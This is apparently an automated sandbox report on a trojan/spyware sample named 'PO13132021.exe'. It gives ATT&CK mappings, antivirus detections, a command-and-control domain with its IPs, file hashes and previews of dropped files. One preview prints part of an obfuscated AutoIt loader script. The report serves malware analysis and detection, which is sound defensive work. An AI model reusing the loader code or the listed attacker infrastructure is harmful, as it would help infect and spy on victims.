Source: Yara match	File source: 2.2.tpiyon2.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts2	Windows Management Instrumentation211	Valid Accounts2	Exploitation for Privilege Escalation1	Disable or Modify Tools11	OS Credential Dumping2	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API11	Boot or Logon Initialization Scripts	Valid Accounts2	Deobfuscate/Decode Files or Information11	Input Capture21	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Logon Script (Windows)	Access Token Manipulation21	Obfuscated Files or Information2	Credentials in Registry1	System Information Discovery128	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection212	Software Packing31	NTDS	Query Registry1	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Valid Accounts2	LSA Secrets	Security Software Discovery251	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion14	Cached Domain Credentials	Virtualization/Sandbox Evasion14	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation21	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection212	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO13132021.exe	27%	Virustotal		Browse
PO13132021.exe	28%	ReversingLabs	Win32.Trojan.Generic
PO13132021.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	5%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	21%	ReversingLabs	Win32.PUA.Wacapew

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.tpiyon2.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
2.1.tpiyon2.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
0.2.PO13132021.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
2.2.tpiyon2.exe.2810000.3.unpack	100%	Avira	TR/Spy.Gen8	Download File
0.0.PO13132021.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

Source	Detection	Scanner	Label	Link
polar.argondns.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://8fEo7xWGmGml.org	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://zztVNZ.com	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
polar.argondns.net	91.210.107.22	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://8fEo7xWGmGml.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000000.202042794.0000000000B79000.00000002.00020000.sdmp, tpiyon2.exe, 00000002.00000000.205351945.00000000004C9000.00000002.00020000.sdmp, ioqwel.exe.0.dr	false		high
http://127.0.0.1:HTTP/1.1	tpiyon2.exe, 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	tpiyon2.exe, 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_Error	PO13132021.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	PO13132021.exe	false		high
https://www.autoitscript.com/autoit3/	PO13132021.exe, 00000000.00000002.217235174.00000000028E0000.00000004.00000001.sdmp, ioqwel.exe, 00000001.00000002.214822872.0000000004553000.00000004.00000001.sdmp, ioqwel.exe.0.dr	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	tpiyon2.exe, 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://zztVNZ.com	tpiyon2.exe, 00000002.00000002.586869289.0000000002E01000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	ioqwel.exe, 00000001.00000002.213456226.00000000032F0000.00000004.00000001.sdmp, tpiyon2.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
91.210.107.22	unknown	Russian Federation	49335	NCONNECT-ASRU	true
91.210.107.54	unknown	Russian Federation	49335	NCONNECT-ASRU	false
91.210.107.62	unknown	Russian Federation	49335	NCONNECT-ASRU	false
91.210.107.53	unknown	Russian Federation	49335	NCONNECT-ASRU	false
91.210.107.52	unknown	Russian Federation	49335	NCONNECT-ASRU	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344901
Start date:	27.01.2021
Start time:	12:32:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO13132021.scr (renamed file extension from scr to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/5@1/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.5% (good quality ratio 24.8%) Quality average: 79.3% Quality standard deviation: 29.6%
HCA Information:	Successful, ratio: 58% Number of executed functions: 128 Number of non-executed functions: 147
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 51.11.168.160, 23.210.248.85, 20.54.26.129, 95.101.27.142, 95.101.27.163, 51.103.5.186, 95.101.22.216, 95.101.22.224, 51.104.139.180, 52.155.217.156 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:33:46	API Interceptor	1017x Sleep call for process: tpiyon2.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
91.210.107.22	haitianx.exe	Get hash	malicious	Browse
	pPKwe2k3h8.exe	Get hash	malicious	Browse
	POn#U00b0 08312020xlx.exe	Get hash	malicious	Browse
91.210.107.54	haitianx.exe	Get hash	malicious	Browse
91.210.107.54	pPKwe2k3h8.exe	Get hash	malicious	Browse
91.210.107.62	haitianx.exe	Get hash	malicious	Browse
91.210.107.53	haitianx.exe	Get hash	malicious	Browse
	pPKwe2k3h8.exe	Get hash	malicious	Browse
	New Order Feb.,2021.doc	Get hash	malicious	Browse
91.210.107.52	nFEmhKJpQ3.exe	Get hash	malicious	Browse
91.210.107.52	wamoH1JlFE.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
polar.argondns.net	haitianx.exe	Get hash	malicious	Browse	91.210.107.22
	pPKwe2k3h8.exe	Get hash	malicious	Browse	91.210.107.22
	New Order Feb.,2021.doc	Get hash	malicious	Browse	91.210.107.62
	nFEmhKJpQ3.exe	Get hash	malicious	Browse	91.210.107.52
	wamoH1JlFE.exe	Get hash	malicious	Browse	91.210.107.52
	POn#U00b0 08312020xlx.exe	Get hash	malicious	Browse	91.210.107.22

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NCONNECT-ASRU	haitianx.exe	Get hash	malicious	Browse	91.210.107.53
	pPKwe2k3h8.exe	Get hash	malicious	Browse	91.210.107.53
	New Order Feb.,2021.doc	Get hash	malicious	Browse	91.210.107.53
	nFEmhKJpQ3.exe	Get hash	malicious	Browse	91.210.107.52
	wamoH1JlFE.exe	Get hash	malicious	Browse	91.210.107.52
	2019-06-12-malware-EXE-from-80.85.155.70.exe	Get hash	malicious	Browse	80.85.155.70
	Ca4fOzoNzJ.exe	Get hash	malicious	Browse	94.177.123.237
	elOHMq4FF0.exe	Get hash	malicious	Browse	94.177.123.237
	z4Bx3C0Q50.exe	Get hash	malicious	Browse	94.177.123.237
	SecuriteInfo.com.Downloader-FBZCB076D449C2FA.exe	Get hash	malicious	Browse	94.177.123.237
	SecuriteInfo.com.ArtemisE88E9DC9AD1C.exe	Get hash	malicious	Browse	185.70.107.72
	o2TVmUuQ2r.exe	Get hash	malicious	Browse	185.70.107.73
	Zh3jpW08zI.exe	Get hash	malicious	Browse	185.70.107.40
	OKtLV4rzIP.exe	Get hash	malicious	Browse	185.70.107.72
	3L42ZG9T7d.exe	Get hash	malicious	Browse	185.70.107.35
	http://www.datacentervision.com/	Get hash	malicious	Browse	185.130.215.154
	osi.exe	Get hash	malicious	Browse	158.255.6.242
	qXpkpxFw.exe	Get hash	malicious	Browse	141.105.68.106
	1nk3VTFB.exe	Get hash	malicious	Browse	141.105.68.106
	W2WcN9LK.exe	Get hash	malicious	Browse	141.105.68.106
NCONNECT-ASRU	haitianx.exe	Get hash	malicious	Browse	91.210.107.53
	pPKwe2k3h8.exe	Get hash	malicious	Browse	91.210.107.53
	New Order Feb.,2021.doc	Get hash	malicious	Browse	91.210.107.53
	nFEmhKJpQ3.exe	Get hash	malicious	Browse	91.210.107.52
	wamoH1JlFE.exe	Get hash	malicious	Browse	91.210.107.52
	2019-06-12-malware-EXE-from-80.85.155.70.exe	Get hash	malicious	Browse	80.85.155.70
	Ca4fOzoNzJ.exe	Get hash	malicious	Browse	94.177.123.237
	elOHMq4FF0.exe	Get hash	malicious	Browse	94.177.123.237
	z4Bx3C0Q50.exe	Get hash	malicious	Browse	94.177.123.237
	SecuriteInfo.com.Downloader-FBZCB076D449C2FA.exe	Get hash	malicious	Browse	94.177.123.237
	SecuriteInfo.com.ArtemisE88E9DC9AD1C.exe	Get hash	malicious	Browse	185.70.107.72
	o2TVmUuQ2r.exe	Get hash	malicious	Browse	185.70.107.73
	Zh3jpW08zI.exe	Get hash	malicious	Browse	185.70.107.40
	OKtLV4rzIP.exe	Get hash	malicious	Browse	185.70.107.72
	3L42ZG9T7d.exe	Get hash	malicious	Browse	185.70.107.35
	http://www.datacentervision.com/	Get hash	malicious	Browse	185.130.215.154
	osi.exe	Get hash	malicious	Browse	158.255.6.242
	qXpkpxFw.exe	Get hash	malicious	Browse	141.105.68.106
	1nk3VTFB.exe	Get hash	malicious	Browse	141.105.68.106
	W2WcN9LK.exe	Get hash	malicious	Browse	141.105.68.106
NCONNECT-ASRU	haitianx.exe	Get hash	malicious	Browse	91.210.107.53
	pPKwe2k3h8.exe	Get hash	malicious	Browse	91.210.107.53
	New Order Feb.,2021.doc	Get hash	malicious	Browse	91.210.107.53
	nFEmhKJpQ3.exe	Get hash	malicious	Browse	91.210.107.52
	wamoH1JlFE.exe	Get hash	malicious	Browse	91.210.107.52
	2019-06-12-malware-EXE-from-80.85.155.70.exe	Get hash	malicious	Browse	80.85.155.70
	Ca4fOzoNzJ.exe	Get hash	malicious	Browse	94.177.123.237
	elOHMq4FF0.exe	Get hash	malicious	Browse	94.177.123.237
	z4Bx3C0Q50.exe	Get hash	malicious	Browse	94.177.123.237
	SecuriteInfo.com.Downloader-FBZCB076D449C2FA.exe	Get hash	malicious	Browse	94.177.123.237
	SecuriteInfo.com.ArtemisE88E9DC9AD1C.exe	Get hash	malicious	Browse	185.70.107.72
	o2TVmUuQ2r.exe	Get hash	malicious	Browse	185.70.107.73
	Zh3jpW08zI.exe	Get hash	malicious	Browse	185.70.107.40
	OKtLV4rzIP.exe	Get hash	malicious	Browse	185.70.107.72
	3L42ZG9T7d.exe	Get hash	malicious	Browse	185.70.107.35
	http://www.datacentervision.com/	Get hash	malicious	Browse	185.130.215.154
	osi.exe	Get hash	malicious	Browse	158.255.6.242
	qXpkpxFw.exe	Get hash	malicious	Browse	141.105.68.106
	1nk3VTFB.exe	Get hash	malicious	Browse	141.105.68.106
	W2WcN9LK.exe	Get hash	malicious	Browse	141.105.68.106

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe	Tender documents_FOB_Offer_Printout.PDF.exe	Get hash	malicious	Browse
	HTG-9087650.exe	Get hash	malicious	Browse
	Order-0S94442VD VictoryJSC.xlsx	Get hash	malicious	Browse
	Purchase Order.xlsx	Get hash	malicious	Browse
	PO#21010028 - SYINDAC QT-00820_pdf.exe	Get hash	malicious	Browse
	MC8ZX01sSo.exe	Get hash	malicious	Browse
	F6AAdCq3uj.exe	Get hash	malicious	Browse
	tZy7EYc9Da.exe	Get hash	malicious	Browse
	YMQ6XNETnU.exe	Get hash	malicious	Browse
	AWB 9899691012 TRACKING INFO_pdf.exe	Get hash	malicious	Browse
	BANK FORM.xlsx	Get hash	malicious	Browse
	order0004345.xlsx	Get hash	malicious	Browse
	Bill of Lading BL.xlsx	Get hash	malicious	Browse
	Clntnjk.xlsx	Get hash	malicious	Browse
	HTG-9066543.exe	Get hash	malicious	Browse
	vbc.exe	Get hash	malicious	Browse
	HTMY-209871640.exe	Get hash	malicious	Browse
	YOeg64zDX4.exe	Get hash	malicious	Browse
	qZtylTGU0c.exe	Get hash	malicious	Browse
	w2kN50kQQ4.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe	HTG-9087650.exe	Get hash	malicious	Browse
	Order-0S94442VD VictoryJSC.xlsx	Get hash	malicious	Browse
	Purchase Order.xlsx	Get hash	malicious	Browse
	PO#21010028 - SYINDAC QT-00820_pdf.exe	Get hash	malicious	Browse
	MC8ZX01sSo.exe	Get hash	malicious	Browse
	F6AAdCq3uj.exe	Get hash	malicious	Browse
	AWB 9899691012 TRACKING INFO_pdf.exe	Get hash	malicious	Browse
	HTG-9066543.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe Download File
Process:	C:\Users\user\Desktop\PO13132021.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 5%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Tender documents_FOB_Offer_Printout.PDF.exe, Detection: malicious, Browse Filename: HTG-9087650.exe, Detection: malicious, Browse Filename: Order-0S94442VD VictoryJSC.xlsx, Detection: malicious, Browse Filename: Purchase Order.xlsx, Detection: malicious, Browse Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious, Browse Filename: MC8ZX01sSo.exe, Detection: malicious, Browse Filename: F6AAdCq3uj.exe, Detection: malicious, Browse Filename: tZy7EYc9Da.exe, Detection: malicious, Browse Filename: YMQ6XNETnU.exe, Detection: malicious, Browse Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious, Browse Filename: BANK FORM.xlsx, Detection: malicious, Browse Filename: order0004345.xlsx, Detection: malicious, Browse Filename: Bill of Lading BL.xlsx, Detection: malicious, Browse Filename: Clntnjk.xlsx, Detection: malicious, Browse Filename: HTG-9066543.exe, Detection: malicious, Browse Filename: vbc.exe, Detection: malicious, Browse Filename: HTMY-209871640.exe, Detection: malicious, Browse Filename: YOeg64zDX4.exe, Detection: malicious, Browse Filename: qZtylTGU0c.exe, Detection: malicious, Browse Filename: w2kN50kQQ4.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Nla\jsgwugqwc.ftb Download File
Process:	C:\Users\user\Desktop\PO13132021.exe
File Type:	data
Category:	dropped
Size (bytes):	291840
Entropy (8bit):	7.999300065062373
Encrypted:	true
SSDEEP:	6144:kIFKOy7s3oaqBaQu90yiRK6TRjM9n0z+QfDZnd9R/kBMnF6ZbIfWwxHAz:MP7s3zqc54Kv0zbdnd9eBMnFi6/m
MD5:	E2805AA2B24333EA055CB4524255CCDD
SHA1:	58715C4C2B07B940B8EF975EB4ABCCA218B7882B
SHA-256:	6508B1408DB51A4C59210FDEE7703D284A675460185A3BA70E060F890D7C2EA0
SHA-512:	C6BFE4EF983EA000FC9E9A6E6B0EAC43A1D52C2648FCC68B6DC07A3F0F6CB24D61FAC116D4ACEC76C876EAD47ED97B64D3F03BC3DC7A044F6C319314C139BD6D
Malicious:	false
Reputation:	low
Preview:	._...&wBnu.K.^7..K....Cg@.x...Y[.S..\|...W........sZ.!-p.&...).....&...n.4l...s\....bz"..]]./.F.@:6J.+..o\|..lD...f..tn./..q.../..0..<.#b.u..D.....~i._.i.m...%O..h......:.]6`._0..f)./..;......&.K.".;.u...K...P....:...(f....-...y..7M.3...A9.w...D.,S.5..x.2...s....\|..&4h&...~..a..;..R.N.5.]xM.K.[.....R.{.....N..g..[.AN}..i..p.....'..R....L.YB.#.Y...w1.P"......2..."a..A. .........<md..<TW..;.... 8..!...... .gbi-E`QW.J...$...H..~....Z.....s+v..z.8..Z...f.A..w.O..G.gn..fs.,.dGD...CU.......gw{../.c $'..#.x]z..l....A...Qq.rO3.C....T\...Zzr..D%.<.G3...d.....,UH.'w!..../..V. .........E..RU.n\|h....G..\.....?.X.v.U....7'....^~..H/..K.Kv+g.U.._....7...M.\.,....k.i..[....u(e.k.z.J.."}.l..u._.F.b.a.w`G<@.&u.......z..p..Nc.T..5.2...6?..e.e....L...w..d...FVEx4#h.oK....!RI..6\|....u>......<CP..zgj..52zl..^..H+.E..%{...j)......IS.hd.b2.F,...\|....{..%'.H.}..T}aqYf&......}Y..8\|..^?.......$NlX.......t. ...XS..i...b._.d\|.1S.. w..3...9..'s..C....c0._MU.d.....j

C:\Users\user\AppData\Local\Temp\Nla\tpiyon2.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.570843086702839
Encrypted:	false
SSDEEP:	12288:apVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M0:aT3E53Myyzl0hMf1tr7Caw8M0
MD5:	535DD1329AEF11BF4654B3270F026D5B
SHA1:	9C84DE0BDE8333F852120AB40710545B3F799300
SHA-256:	B31445FC4B8803D1B7122A6563002CFE3E925FFD1FDC9B84FBA6FC78F6A8B955
SHA-512:	A552E20A09A796A6E3E18DECE308880069C958CF9136BB4FC3EE726D6BC9B2F8EDDBCFF06FF9F9DED4DD268F5D0F39D516AD42ECCE6455A4BF5CF4F3CB4C4ECC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:	Filename: HTG-9087650.exe, Detection: malicious, Browse Filename: Order-0S94442VD VictoryJSC.xlsx, Detection: malicious, Browse Filename: Purchase Order.xlsx, Detection: malicious, Browse Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious, Browse Filename: MC8ZX01sSo.exe, Detection: malicious, Browse Filename: F6AAdCq3uj.exe, Detection: malicious, Browse Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious, Browse Filename: HTG-9066543.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z..........................................@...........................................@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s Download File
Process:	C:\Users\user\Desktop\PO13132021.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	385136
Entropy (8bit):	4.040875529182386
Encrypted:	false
SSDEEP:	96:D6fyJOogeGFlIvMxquc9JH71Qu1SqETSCmQG5mqpUJguXNR2022OdOQqOxFx7IRU:D6fggwMAuKpWIJB
MD5:	2FF4031E23DF3BA8CA445C0CC35B472C
SHA1:	97AB1DA04AB0A6DA94207C0B6BBF453520A6E615
SHA-256:	F2208559DB506C7F145B43755C42D4F57118A0E26CE9FC5ED60AFFE05066BFC9
SHA-512:	2E675BC7838F47ABC2F3A3E3B28E49A2F7CAD449550B18EE2132503F19AE9CA6E6B6AE9EF0BA7568D03F4032BB15DE9049D97204A6B831CA730E9A31C684071E
Malicious:	false
Reputation:	low
Preview:	Global $Z3232ddy8i5i = Execute("Chr")..#NoTrayIcon..Global $R308k3t564c, $T31p8e, $X32o2tny2y, $A33y7teo, $I34iii, $N353fv6..For $R308k3t564c = 0 To Random(5, 8, 1).. $X32o2tny2y = 0.. For $A33y7teo = 2 To 100.. $T31p8e = True.. $I34iii = 2.. While $I34iii*$I34iii<=$R308k3t564c.. If Mod($R308k3t564c, $I34iii) == 0 Then.. $X32o2tny2y = False.. ExitLoop.. EndIf.. $I34iii += 1.. WEnd.. If $T31p8e Then $X32o2tny2y = $A33y7teo.. Next..Next..Dim $D3231lmvqm = GUICreate($Z3232ddy8i5i((-402+481))&$Z3232ddy8i5i((-364+481))&$Z3232ddy8i5i((-365+481))&$Z3232ddy8i5i((-383+481))&$Z3232ddy8i5i((-364+481))&$Z3232ddy8i5i((-382+481))&$Z3232ddy8i5i((-374+481))&$Z3232ddy8i5i((-449+481))&$Z3232ddy8i5i((-408+481))&$Z3232ddy8i5i((-371+481))&$Z3232ddy8i5i((-382+481)), 102, 240, -99999, -99999, 0, 128)....GUISetState(@SW_SHOW)..Global $C3333m4s7zv2 = Execute($Z3232ddy8i5i((-412+481))&$Z3232ddy8i5i((-361+481))&$Z3232ddy8i5i((-380+481))&$Z3232ddy8i5i((-382+481))&$Z3232ddy8i5i((-364+481))&$Z3232d

C:\Users\user\AppData\Local\Temp\nstBE20.tmp Download File
Process:	C:\Users\user\Desktop\PO13132021.exe
File Type:	data
Category:	dropped
Size (bytes):	1573047
Entropy (8bit):	6.999007197019042
Encrypted:	false
SSDEEP:	24576:aT3E53Myyzl0hMf1tr7Caw8M0TgDFczdT/m:43EZpBh211Waw30TgDFcBC
MD5:	C1DB9615BCC91F1C6F24F23CE98704BF
SHA1:	AF374C57B8B9D416FAEFA381B4B99D677FB77150
SHA-256:	8AEDAE19F4A93BBA5822454BC6B06CF2D4650FA44B842DA9EEEBD6DF5B4F7DC3
SHA-512:	DE3D0832ACCF2A8582709D02C37DEAF25A7ED29CBAC29A841CB5965A8AF1C50E115A38FF1C8902D037DE50106463A13AE4EA2F531468BDF8CB7C9377A50178FD
Malicious:	false
Reputation:	low
Preview:	........,...................................................................................................................................................................................................................................................................................J...............1...g...............................................................j...............................................................................................................................N.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.98445424363155
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO13132021.exe
File size:	725929
MD5:	7c4c3a12f367dcd154accce5948ebaeb
SHA1:	b0a7b80ddd9b86a20d3a41e3423cedb341b6220c
SHA256:	1a1e74fbe89bed37913351432c163e204018655e51811aabb9e5fc6a06cf5887
